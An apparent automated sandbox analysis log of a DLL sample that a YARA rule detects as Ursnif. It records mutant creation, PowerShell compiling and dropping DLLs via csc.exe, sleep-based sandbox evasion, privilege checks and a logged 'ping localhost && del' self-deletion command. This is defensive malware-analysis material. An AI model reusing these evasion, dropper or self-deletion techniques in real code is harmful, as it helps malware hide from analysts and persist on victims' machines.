                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{18B00793-9774-0A09-E1CC-BBDEA5C01FF2}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{107D1110-2FAD-C278-3944-D3167DB8B7AA}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: VoevdOQpeU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049FB2FF push esi; retf 2_2_049FB301
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F820B push ecx; ret 2_2_049F821B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F7E20 push ecx; ret 2_2_049F7E29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05812C1A push ecx; mov dword ptr [esp], 00000002h2_2_05812C1B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058237E3 push ecx; ret 2_2_058237F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058232B0 push ecx; ret 2_2_058232B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0580A513
                      Source: bscdh0f0.dll.28.drStatic PE information: real checksum: 0x0 should be: 0x5d5f
                      Source: poet0yxq.dll.26.drStatic PE information: real checksum: 0x0 should be: 0xdf1c
                      Source: VoevdOQpeU.dllStatic PE information: real checksum: 0x872fe521 should be: 0xab1d3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5717Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3615Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_0580FCC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_0580CE21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_05805A14
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
